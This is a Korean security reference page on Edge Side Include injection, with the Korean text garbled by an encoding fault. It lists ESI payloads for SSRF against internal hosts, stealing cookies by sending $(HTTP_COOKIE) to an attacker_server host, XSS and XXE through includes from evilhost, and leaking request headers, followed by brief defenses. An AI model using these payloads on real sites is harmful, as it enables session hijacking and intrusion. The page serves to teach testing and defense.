ESI(Edge Side Include) Injection

ESI(Edge Side Include) Injection

in

๐Ÿ” Introduction

ESIi๋Š” ESI(Edge Side Include) Injection์œผ๋กœ ESI ์‚ฌ์šฉํ•˜๋Š” ํ™˜๊ฒฝ์—์„œ ํ•ด๋‹น Markup์— ๋Œ€ํ•œ Injection ๊ณต๊ฒฉ์„ ์˜๋ฏธํ•ฉ๋‹ˆ๋‹ค.

ESI๋Š” Edge Side Include์˜ ์•ฝ์ž๋กœ ์ธํ„ฐ๋„ท์˜ Edge์—์„œ ์›น ์• ํ”Œ๋ฆฌ์ผ€์ด์…˜์˜ ๋™์  ์–ด์…ˆ๋ธ”๋ฆฌ ๋ฐ ์ „์†ก์„ ์œ„ํ•œ ์›น ํŽ˜์ด์ง€ ๊ตฌ์„ฑ ์š”์†Œ๋ฅผ ์ •์˜ํ•˜๋Š” ๋ฐ ์‚ฌ์šฉ๋˜๋Š” ๊ฐ„๋‹จํ•œ ๋งˆํฌ์—… ์–ธ์–ด์ž…๋‹ˆ๋‹ค. Page assembly๋ฅผ ์œ„ํ•œ ํ‘œ์ค€ ํƒœ๊ทธ๋กœ ์›น ์บ์‹œ, LB ๋“ฑ์˜ ๊ตฌ์กฐ์—์„œ ์‚ฌ์šฉ๋ฉ๋‹ˆ๋‹ค.

HTML ์ฝ”๋“œ ๋‚ด์—์„œ ESI๋Š” ์•„๋ž˜์™€ ๊ฐ™์ด <esi:> ํƒœ๊ทธ๋กœ ์›น ๋ธŒ๋ผ์šฐ์ €๋กœ Response body๊ฐ€ ๋„˜์–ด์˜ค๊ธฐ ์ „์— ESI๋ฅผ ์ฒ˜๋ฆฌํ•  ์ˆ˜ ์žˆ๋Š” ์บ์‹œ ์„œ๋ฒ„๋“ฑ์—์„œ ๋ฏธ๋ฆฌ ์ฒ˜๋ฆฌ๋˜์–ด ๋ฐ์ดํ„ฐ๊ฐ€ ๋„˜์–ด์˜ค๊ฒŒ ๋ฉ๋‹ˆ๋‹ค.

<table>
<tr>
<td>test</td>
<td>
<esi:try>
  Invalid markup here
  <esi:attempt>
    <esi:include โ€ฆ >   
    <!-- ์‹ค์ œ ์ฝ”๋“œ ๊ตฌ์„ฑ์œผ๋ก  <esi: ์ด๋ ‡๊ฒŒ ์‹œ์ž‘ํ•˜์ง€๋งŒ, -->
    <!-- ์บ์‹œ์—์„œ ํ•ด๋‹น ๋ถ€๋ถ„ ๋‚ด์šฉ์„ ์ฑ„์šฐ๊ณ  ์‚ฌ์šฉ์ž์—๊ฒŒ ๋„˜๊ฒจ์ค๋‹ˆ๋‹ค. -->
    This line is valid and will be processed.
  </esi:attempt>
  Invalid markup here
  <esi:except>
  This HTML line is valid and will be processed.
  </esi:except>
  Invalid markup here
</esi:try>
</td>

Affected

ATS, Squid ๋“ฑ ์—ฌ๋Ÿฌ Application์—์„œ ์‚ฌ์šฉ ๊ฐ€๋Šฅํ•ฉ๋‹ˆ๋‹ค. ์•„๋ž˜ ๋ฆฌ์ŠคํŠธ ์ด์™ธ์—๋„ ๋งŽ์€ Application์ด ์ด๋ฅผ ์ง€์›ํ•˜๊ณ  ์žˆ์Šต๋‹ˆ๋‹ค.

Service Include Param Headers
ATS(Apache Traffic Server) O O O
Squid3 O O O
Varnish Cache O N N
Fastly O N N
Akamai ESI Test Server O O O
NodeJS - esi O O O
NodeJS - nodesi O N N
Oracle Web Cache O O O

๐Ÿ—ก Offensive techniques

Detect

<esi:include โ€ฆ > ๊ณผ ๊ฐ™์ด esi ๋ฌธ๋ฒ•์„ ํ†ตํ•ด ์‹ค์ œ๋กœ ๋ธŒ๋ผ์šฐ์ €๋กœ ๋ฐ์ดํ„ฐ๊ฐ€ ๋„˜์–ด์˜ค๊ธฐ ์ „ esi ์ฒ˜๋ฆฌ๊ฐ€ ์žˆ๋Š”์ง€ ํ™•์ธํ•˜๋ฉด ๋ฉ๋‹ˆ๋‹ค. ๊ฐ„๋‹จํ•œ ๋ฐฉ๋ฒ•์œผ๋ก  ์ž„์˜ ํŽ˜์ด์ง€๋ฅผ include ํ•˜๋Š” ๋ฐฉ๋ฒ•์ด ์žˆ์Šต๋‹ˆ๋‹ค.

esii test
<esi:include src="http https://www.hahwul.com/CNAME"/>

https://www.hahwul.com/CNAME ํŽ˜์ด์ง€์˜ Body๋Š” ์•„๋ž˜์™€ ๊ฐ™์ด www.hahwul.com๋งŒ ์žˆ์Šต๋‹ˆ๋‹ค.

์ด์ œ ์ด ์ฝ”๋“œ๋ฅผ ๋กœ๋“œ์‹œํ‚ค๋Š” ํŽ˜์ด์ง€์—์„œ esi ๊ตฌ๋ฌธ ๋Œ€์‹  www.hahwul.com์ด ์ฐํžˆ๊ฒŒ ๋˜๋ฉด LB๋‚˜ ์บ์‹œ ๋“ฑ์—์„œ ESI ๋ฌธ๋ฒ•์„ ์ฒ˜๋ฆฌํ•œ๋‹ค๋Š” ๊ฒƒ์„ ์•Œ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

esii test
www.hahwul.com

Exploitation

SSRF

include๋ฅผ ํ†ตํ•ด ๊ณต๊ฒฉ์ž๊ฐ€ ์˜๋„ํ•œ URL์„ Response ํŽ˜์ด์ง€ ๋‚ด include ์‹œํ‚ฌ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ์ด๋ฅผ ์ด์šฉํ•ด์„œ SSRF๋กœ ๋‚ด๋ถ€ ์‹œ์Šคํ…œ์— ์ ‘๊ทผํ•˜๊ฑฐ๋‚˜ OOB(Out-of-Band)๋กœ ๋ฐ์ดํ„ฐ๋ฅผ ์œ ์ถœํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

<esi:include src="https://internal_domain"/>
<esi:include src=http://127.0.0.1/server-status/>
<esi:include src=http://internal_domain/server_base_csrf_page/>

Session Hijacking

ESI์—์„œ ${HTTP_COOKIE}๋ฅผ ์‚ฌ์šฉํ•˜๋ฉด ์ฟ ํ‚ค ์ •๋ณด๋ฅผ ์ฝ์„ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ๋˜ํ•œ ์ด๋ฅผ ํ†ตํ•ด์„œ ์ฟ ํ‚ค ๋“ฑ์„ ํƒˆ์ทจํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ์ด๋Ÿฌํ•œ ํ˜•ํƒœ๋กœ ํƒˆ์ทจํ•˜๋Š” ๊ฒฝ์šฐ ์ฟ ํ‚ค ๋ณด์•ˆ ์ •์ฑ…์„ ๋ฐ›์ง€ ์•Š๊ธฐ ๋•Œ๋ฌธ์— HttpOnly ๋“ฑ์œผ๋กœ ๋ณดํ˜ธ๋œ ์ฟ ํ‚ค๋„ ๊ฐ€์ ธ์˜ฌ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

<esi:vars>$(HTTP_COOKIE)</esi:vars>
<esi:vars>$(HTTP_COOKIE{PHPSESSID})</esi:vars>
<esi:vars>$(HTTP_COOKIE{JSESSIONID})</esi:vars>
<esi:vars>$(HTTP_COOKIE{Private_Cookie})</esi:vars>

ํ•˜๋‚˜ ์˜ˆ๋ฅผ๋“ค์–ด ๋ณด๋ฉด ์•„๋ž˜ include๋กœ ๊ณต๊ฒฉ์ž์˜ ๋„๋ฉ”์ธ์— ์›น ์š”์ฒญ์„ ๋ฐœ์ƒ ์‹œํ‚ค๋„๋ก ์œ ๋„ํ•˜๊ณ  Query์— Cookie ๊ฐ’์„ ์ฝ์–ด์„œ ์ „์†กํ•˜๋„๋ก ESI ๊ตฌ๋ฌธ์„ ์ž‘์„ฑํ•ฉ๋‹ˆ๋‹ค.

<esi:include src="https://attacker_server/?$(HTTP_COOKIE)"/>

ํ•ด๋‹น ESI ๊ตฌ๋ฌธ์ด ์ฒ˜๋ฆฌ๋˜์–ด ์‹คํ–‰๋˜๋Š” ์ˆœ๊ฐ„ ๊ณต๊ฒฉ์ž ์„œ๋ฒ„๋กœ ์›น ์š”์ฒญ์ด ๋ฐœ์ƒํ•˜๋ฉด์„œ ์›น ๋กœ๊ทธ๋ฅผ ํ†ตํ•ด ์ฟ ํ‚ค ์ •๋ณด๋ฅผ ํƒˆ์ทจํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

Attacker server

127.0.0.1 "GET /?auth=56F21F5D19F9402B04610CF9108264BC266FBAF7... HTTP/1.1" 200

XSS

ESI์—์„œ include๋Š” response ํŽ˜์ด์ง€์— ์ง์ ‘ ํ•ด๋‹น ํŽ˜์ด์ง€๋ฅผ ์‚ฝ์ž…ํ•˜๊ธฐ ๋•Œ๋ฌธ์— ๋ฏธ๋ฆฌ ๊ตฌ์„ฑํ•œ XSS ์ฝ”๋“œ๋ฅผ Response ํŽ˜์ด์ง€์— ๋กœ๋“œ์‹œํ‚ฌ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

<esi:include src=https://attacker_server/xss.html/>

XXE

XXE๋„ ์œ ์‚ฌํ•ฉ๋‹ˆ๋‹ค. include๋กœ ๊ณต๊ฒฉ์ฝ”๋“œ๊ฐ€ ์‚ฝ์ž…๋œ xml ํŒŒ์ผ์„ ํ˜ธ์ถœ ์‹œํ‚ต๋‹ˆ๋‹ค.

<esi:include src="http://evilhost/poc.xml" dca="xslt" stylesheet="http://evilhost/poc.xsl" />

xslt file

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE xxe [<!ENTITY xxe SYSTEM "http://evilhost/file" >]>
<foo>&xxe;</foo>

Leak request body/header

ESI ๊ตฌ๋ฌธ์—์„  request body์™€ header๋„ ํฌํ•จ์‹œํ‚ฌ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ์ด๋ฅผ ํ†ตํ•ด ํŒจ์Šค์›Œ๋“œ๋‚˜ ์ธ์ฆ ํ”Œ๋กœ์šฐ์—์„œ ์ค‘์š”ํ•œ ์ •๋ณด๋ฅผ ๊ณต๊ฒฉ์ž๊ฐ€ ํƒˆ์ทจํ•  ์ˆ˜๋„ ์žˆ์Šต๋‹ˆ๋‹ค.

<esi:request_body>
<esi:request_header>

Information leak

์œ„์—์„œ COOKIE ์˜ˆ์‹œ๋ฅผ ๋“ค์—ˆ์ง€๋งŒ, ์ด์™ธ์—๋„ ๋‹ค๋ฅธ ์ •๋ณด๋„ ๊ฐ€์ ธ์˜ฌ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

<esi:vars>$(HTTP_USER_AGENT)</esi:vars>
<esi:vars>$(QUERY_STRING)</esi:vars>

More

์ด์™ธ์—๋„ ESI ๋ฌธ๋ฒ•์„ ํ†ตํ•ด ์—ฌ๋Ÿฌ๊ฐ€์ง€ ํ˜•ํƒœ์˜ ๊ณต๊ฒฉ์ด ๊ฐ€๋Šฅํ•ฉ๋‹ˆ๋‹ค. ESI ๋ฌธ๋ฒ•์— ๋Œ€ํ•œ ์ž์„ธํ•œ ๋‚ด์šฉ์€ ์•„๋ž˜ Oracle ๋ฌธ์„œ๋ฅผ ์ฐธ๊ณ ํ•˜์‹œ๊ธฐ ๋ฐ”๋ž๋‹ˆ๋‹ค.

  • https://docs.oracle.com/cd/B14099_19/caching.1012/b14046/esi.htm

Bypass protection

XSS์™€ ์œ ์‚ฌํ•ฉ๋‹ˆ๋‹ค. ESI๋ฅผ ์‚ฌ์šฉํ•˜์ง€๋งŒ ์ผ๋ถ€ ํŠน์ˆ˜๋ฌธ์ž ๋˜๋Š” ๊ณต๊ฒฉ๊ตฌ๋ฌธ ๋“ฑ์„ ์ œํ•œํ•˜๋„๋ก ๋กœ์ง์ด ์กด์žฌํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ์ด๋Ÿฐ ๊ฒฝ์šฐ XSS์™€ ๋™์ผํ•˜๊ฒŒ ์ธ์ฝ”๋”ฉ ๋“ฑ์„ ํ†ตํ•ด ์šฐํšŒ๋ฅผ ์‹œ๋„ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ์ž์„ธํ•œ ๋‚ด์šฉ์€ XSS์˜ Bypass protection ๋ถ€๋ถ„์„ ์ฐธ๊ณ ํ•ด์ฃผ์„ธ์š”.

๐Ÿ›ก Defensive techniques

Disable ESI

๊ฐ€์žฅ ๊ฐ„๋‹จํ•œ ๋ฐฉ๋ฒ•์€ ์„œ๋น„์Šค์—์„œ ESI๋ฅผ ์‚ฌ์šฉํ•˜์ง€ ์•Š๋Š”๋‹ค๋ฉด Disable ์ฒ˜๋ฆฌํ•˜๋Š” ๊ฒƒ์ž…๋‹ˆ๋‹ค.

Escape ESIi

XSS์™€ ๋Œ€์‘๋ฐฉ์•ˆ์ด ์œ ์‚ฌํ•ฉ๋‹ˆ๋‹ค. ๋ถˆํ•„์š”ํ•œ ํŠน์ˆ˜๋ฌธ์ž, ๋ฐ์ดํ„ฐ ํƒ€์ž…์„ ์ž„์˜๋กœ ํŽ˜์ด์ง€์— ๋ฐ˜์˜์‹œ์ผœ ๋™์ž‘์ด ๋ฐœ์ƒํ•˜์ง€ ์•Š๋„๋ก ์ œํ•œํ•ฉ๋‹ˆ๋‹ค. ๋˜ํ•œ ESIi๋Š” ์‚ฌ์šฉ์ž ์ฆ‰ ํด๋ผ์ด์–ธํŠธ๋‹จ ๊ณต๊ฒฉ์ด๊ธฐ๋„ ํ•˜๋ฉด์„œ ์„œ๋ฒ„๋‹จ ๊ณต๊ฒฉ์ด๊ธฐ๋„ ํ•ฉ๋‹ˆ๋‹ค. HTTP Request Smuggling ๋“ฑ ๋‹ค๋ฅธ ์ทจ์•ฝ์ ๊ณผ ๊ฒฐํ•ฉ ์‹œ ๋” ํฐ ๋ฆฌ์Šคํฌ๋ฅผ ๋งŒ๋“ค ์ˆ˜ ์žˆ๊ธฐ ๋•Œ๋ฌธ์— ๊ฐ€๊ธ‰์  ๊ผผ๊ผผํ•˜๊ฒŒ ์ฒดํฌํ•˜๋Š” ๊ฒƒ์ด ํ•„์š”ํ•ฉ๋‹ˆ๋‹ค.

๐Ÿ•น Tools

  • Iโ€™ll make it later and add it ๐Ÿ˜Ž

๐Ÿ“š Articles

  • https://www.hahwul.com/2018/08/18/edge-side-include-injection-web-attack/

๐Ÿ“Œ References